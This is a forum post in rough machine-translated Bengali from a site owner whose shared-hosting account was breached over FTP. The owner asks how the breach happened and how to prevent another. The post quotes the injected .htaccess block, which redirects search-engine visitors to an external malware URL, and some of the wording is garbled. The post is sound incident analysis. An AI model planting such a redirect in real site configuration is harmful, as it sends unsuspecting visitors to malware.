আমার সাইটটি হ্যাক হয়ে গেছে এবং এই মুহুর্তে, আমি কিছু বিশদ জানি, তবে এটি কীভাবে ঘটল বা ভবিষ্যতে কীভাবে এটি প্রতিরোধ করা যায় সে সম্পর্কে আমি একটি ক্ষতির মধ্যে আছি। আক্রমণটি ছড়িয়ে দেওয়ার চেষ্টা করতে আমার আপনার সহায়তা দরকার যাতে আমি এটি আবার ঘটতে বাধা দিতে পারি। এটি কিছুটা দীর্ঘ, তবে আমি সমস্যাটি সমাধানে সহায়তা করার জন্য পর্যাপ্ত তথ্য দিচ্ছি তা নিশ্চিত করতে চাই।
এখানে কি ঘটেছে।
কয়েক সপ্তাহ আগে আমি আমার হোস্টিং সংস্থা গোডাডির কাছ থেকে একটি ইমেল পেয়েছিলাম যে আমার সাইটটি প্রচুর সংস্থান ব্যবহার করছে এবং তারা আশা করেছিল যে মাইএসকিউএল কোয়েরিই অপরাধী ছিল। প্রশ্নের ক্যোয়ারী ছিল একটি অনুসন্ধান ক্যোয়ারী যার এতে 5-6 টি পদ রয়েছে। আমি যেভাবে এটি সেট আপ করেছি, আপনি যত বেশি পদ অনুসন্ধান করেছেন, তত তত জটিল হয়ে উঠবে। সমস্যা নেই. আমি এটি ঠিক করেছিলাম, কিন্তু একই সাথে গোডাডিও অস্থায়ীভাবে আমার অ্যাকাউন্টটি বন্ধ করে দিয়েছিল এবং সবকিছু স্বাভাবিক অবস্থায় ফিরে আসার প্রায় 3 দিন আগে।
এই ঘটনার পরে, আমার অনুসন্ধান ইঞ্জিন ট্র্যাফিক নাটকীয়ভাবে হ্রাস পেয়েছে, প্রায় 90%। এটি স্তন্যপান করা হয়েছিল, আমি এর কিছুই ভেবেছিলাম না, এটিকে ক্যোয়ারী ফাইস্কোর কাছে লিখে লিখেছিলাম যে গুগল সাইটটি পুনরায় রেনলিং করার সাথে সাথে এটি সময় মতো ফিরে আসবে। তা হয়নি।
কিছু দিন আগে, আমি একজন ব্যবহারকারীর কাছ থেকে একটি ইমেল পেয়েছিলাম যে আমার সাইটটি ম্যালওয়ার হোস্ট করছে। আমি সাইটটি সরাসরি আমার ব্রাউজারে লোড করেছিলাম, তবে পৃষ্ঠায় কোনও ইঞ্জেকশন দেখিনি। তারপরে আমি আমার .htaccess ফাইলটি পরীক্ষা করে নীচের জিনিসগুলি পেয়েছি:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>
চতুর। আর একটু বিভ্রান্ত। অ্যাড্রেস বার বা বুকমার্ক থেকে সরাসরি সাইটে নেভিগেট করা, আমি সাধারণত যা করি তা সাইটটিকে স্বাভাবিক হিসাবে লোড করবে। খুব কমই আমি কখনও কোনও অনুসন্ধান ইঞ্জিনের একটি লিঙ্কের মাধ্যমে আমার সাইটে যাই, তাই হ্যাকটি যতক্ষণ না সনাক্ত করা যায় ততক্ষণ আবিষ্কার করা যায়। ম্যালওয়্যারটি সরাসরি আমার সাইটে হোস্ট করা হয়নি।
একটি দ্রুত অনুসন্ধানে দেখা গেছে যে অন্যান্য লোকদেরও একই সমস্যা হচ্ছে, যদিও আমি সন্দেহ করি যে আরও অনেক এখনও রয়েছে যারা এখনও এটি সনাক্ত করে নি। বেশিরভাগ প্রস্তাবনাগুলি ছিল সফ্টওয়্যারটির সর্বশেষ সংস্করণে আপগ্রেড করা, পাসওয়ার্ড পরিবর্তন করা ইত্যাদি to
আমি নিজের কাস্টম কনটেন্ট ম্যানেজমেন্ট সিস্টেমটি ব্যবহার করি এবং সর্বব্যাপী ওয়ার্ডপ্রেস না থাকায় আমি আরও গভীর গর্ত করেছি। আমি পিএইচপি শোষণে ব্যবহৃত সমস্ত সাধারণ ফাংশনগুলির জন্য আমার সমস্ত ফাইল স্ক্যান করেছিলাম: বেস d৪_ডেকোড, এক্সিকিউট, শেল, ইত্যাদি ... সন্দেহজনক কিছুই হয়নি এবং কোনও অতিরিক্ত ফাইল উপস্থিত ছিল না।
এরপরে আমি গোডাড্ডির ফাইল ম্যানেজারের ইতিহাস পরীক্ষা করে দেখলাম যে .htaccess ফাইলটি ঠিক একই তারিখে পরিবর্তিত হয়েছিল যখন আমার অনুসন্ধান অনুসন্ধানে অনেক বেশি সার্ভার সংস্থান ব্যবহার করার অভিযোগ আনা হয়েছিল। এটি একটি দুর্ভাগ্যজনক কাকতালীয় ঘটনা হতে পারে, তবে আমি পুরোপুরি নিশ্চিত নই। .Htaccess ফাইলে পুনর্নির্দেশটি রিসোর্স নিবিড় বলে মনে হয় না এবং ক্যোয়ারী যথেষ্ট জটিল ছিল যে এটি সংস্থান-নিবিড় হতে পারে।
আমি নিশ্চিত হতে চেয়েছিলাম যে আমার কোডটি সমস্যা ছিল না, তাই .htaccess ফাইলটি সংশোধন করা হয়েছিল এমন সময়ে আমি সন্দেহজনক ক্রিয়াকলাপের জন্য ট্র্যাফিক লগগুলি চেক করেছিলাম, তবে এমন কোনও জিইটি বা পোস্ট পোস্ট দেখিনি যা অস্বাভাবিক দেখায় বা এর মতো হ্যাক প্রচেষ্টা।
অবশেষে, আমি GoDaddy থেকে এফটিপি লগগুলির জন্য অনুরোধ করেছিলাম এবং খুঁজে পেয়েছিলাম যে .htaccess ফাইলটি পরিবর্তিত হওয়ার সময় সেখানে অননুমোদিত FTP অ্যাক্সেস ছিল। আমি তখন ছুটিতে ছিলাম, আমার কম্পিউটারটি শারীরিকভাবে বন্ধ করে দিয়েছিলাম এবং অ্যাক্সেস শংসাপত্রগুলির সাথে আর কেউ নেই। দেখে মনে হচ্ছে যে এফটিপি যে কেউ অ্যাকাউন্টটির জন্য প্রাথমিক এফটিপি ব্যবহারকারী ব্যবহার করেছে, তবে 91.220.0.19 এর আইপি সহ, এটি দেখতে লাতভিয়ার মত দেখাচ্ছে ।
ভাগ করা হোস্টিংয়ে এটি প্রদর্শিত হয় GoDaddy স্বয়ংক্রিয়ভাবে সাইটের ইউআরএল ভিত্তিক একটি প্রাথমিক এফটিপি ব্যবহার করে। এটি অত্যন্ত অনুমানযোগ্য বা কমপক্ষে, আমি যখন আমার হোস্টিং অ্যাকাউন্টটি সেট আপ করতাম তখন এটি ছিল। আমি বেশ কয়েক বছর আগে প্রথম হোস্টিং অ্যাকাউন্টে সাইন আপ করেছি, তাই এটি পরিবর্তিত হতে পারে, তবে যা মনে আছে তা থেকে, আমি প্রাথমিক এফটিপি ব্যবহারকারীর নামটি বেছে নিতে পারিনি। বর্তমানে, আপনি ব্যবহারকারীর নামটি পরিবর্তন করতেও অক্ষম এবং এটি মনে হচ্ছে যে আপনি নিজের অ্যাকাউন্ট বাতিল না করে এবং পদত্যাগ না করলে GoDaddy কোনওভাবেই অক্ষম। আপনি অন্যান্য এফটিপি ব্যবহারকারী তৈরি করতে, মুছতে এবং সম্পাদনা করতে পারবেন, প্রাথমিক এফটিপি ব্যবহারকারী মুছতে পারবেন না। শুধুমাত্র পাসওয়ার্ড পরিবর্তন করা যেতে পারে।
প্রাথমিক এফটিপি ব্যবহারকারীর নাম বাদে সাইট, ডাটাবেস, অ্যাডমিন এবং অ্যাকাউন্টের অ্যাক্সেস শংসাপত্রগুলির সমস্ত হ'ল জিব্বারিশ, এলোমেলো ব্যবহারকারীর নাম এবং পাসওয়ার্ড যা আপনার বিড়ালের মতো দেখতে আপনার কীবোর্ডে চলেছে। উদাঃ lkSADf32! J asJd3।
ভাইরাস, ম্যালওয়্যার ইত্যাদির জন্য আমি আমার কম্পিউটারটি ভালভাবে স্ক্যান করেছি যদি এটি লিঙ্কটির দুর্বল পয়েন্ট তবে কিছুতেই আপস আপ হয় নি। আমি একটি ফায়ারওয়াল, একটি অ্যান্টি-ভাইরাস প্রোগ্রাম ব্যবহার করি এবং নিরাপদ ব্রাউজিং অভ্যাস ব্যবহার করার চেষ্টা করি।
আমি যখন আমার সাইট আপডেট করি তখন আমি কোর এফটিপি এলই এবং একটি এসএসএইচ / এসএফটিপি সংযোগ ব্যবহার করি। হোস্টিং অ্যাকাউন্টটি একটি লিনাক্স সেটআপ।
GoDaddy প্রযুক্তি সহায়তার সাথে কথা বলার ক্ষেত্রে, তারা এফটিপি পাসওয়ার্ডের সাথে কীভাবে আপস হয়েছে তা নিশ্চিত নয়। ভাগ করা হোস্টিংয়ে, তারা এফটিপি ব্যবহারকারী পর্যায়ে একটি আইপি ব্লক রাখতে অক্ষম। তারা প্রাথমিক এফটিপি ব্যবহারকারীর নাম পরিবর্তন করতে অক্ষম। যখন আমি জিজ্ঞাসা করলাম এফটিপি অ্যাক্সেসের আশেপাশে তাদের নিষ্ঠুর শক্তি সুরক্ষা আছে কিনা, প্রযুক্তিটি প্রথমে অনিশ্চিত বলে মনে হয়েছিল, কিন্তু তারপরে বলেছিল যে আমি এটি কয়েকবার পুনর্বিবেচনা করার পরে তারা করেছি। তবে, আমি মনে করি আমি আগের কলটিতে একই প্রশ্ন জিজ্ঞাসা করেছি এবং শুনেছি যে GoDaddy এর এফটিপি অ্যাক্সেসে নিরপেক্ষ সুরক্ষা নেই। এই মুহুর্তে, আমি জানি না তারা করুক বা না করুক।
আমি বোর্ডের মাধ্যমে আমার অ্যাক্সেসের সমস্ত শংসাপত্রগুলি পরিবর্তন করে দিয়েছি এবং htaccess ফাইল ব্যবহার করে লাত্ভীয় আইপি ঠিকানাটিও নিষিদ্ধ করেছি (তারা এফটিপি ব্যবহার করলে সম্ভবত কোনও পার্থক্য দেখাবে না), তবে এফটিপি কীভাবে হয় তা আমি এখনও নিশ্চিত নই পাসওয়ার্ড দিয়ে শুরু করার জন্য আপস করা হয়েছিল।
আমি মোটামুটি নিশ্চিত হয়েছি যে সমস্যাটি আমার কোড (যদিও এটি ছিল, এফটিপি তথ্যটি প্রকাশ করা উচিত হয়নি) বা আমার কম্পিউটারের সাথে নয়। আমার সন্দেহ, কিন্তু কীভাবে প্রমাণ করতে হয় তা জানি না, এটি ব্যবহারকারীর নাম অনুমানযোগ্য হওয়ার কারণে এফটিপি পাসওয়ার্ডটি জোর করে জোর করা হয়েছিল। ব্রুট-ফোর্স আক্রমণটি সার্ভার রিসোর্সগুলি ব্যবহৃত হওয়ার সাথেও মিলিত হতে পারে (আমার প্রশ্নের সন্ধানে দোষ দেওয়া হয়েছে), তবে সার্ভারের প্রযুক্তিগত দিকটি যথেষ্ট কিনা তা সম্ভব কিনা তাও আমি জানি না।
এখন আমার মনে হচ্ছে আমি কী করব জানি তার শেষে আছি। আক্রমণটি কীভাবে করা হয়েছিল এবং কীভাবে এটি প্রতিরোধ করা যায় তা আমি বুঝতে সক্ষম হতে চাই, সুতরাং যদি আক্রমণ আক্রমণকারী ভেক্টর, ডায়াগনস্টিকগুলি চালানো যেতে পারে বা অতিরিক্ত সুরক্ষা ব্যবস্থা সম্পর্কে আপনার আরও কিছু ধারণা থাকে তবে আমি অত্যন্ত কৃতজ্ঞ হব। আমি হোস্ট পরিবর্তন করতে বা ভাগাভাগি করে হোস্টিং করতে রাজি হওয়ার চেয়ে বেশি, তবে আমি নিশ্চিত হতে চাই যে আমি এটি আবার ঘটতে বাধা দিতে পারি।
আমাকে সাহায্য করুন, ওবি-وان কেনোবি ...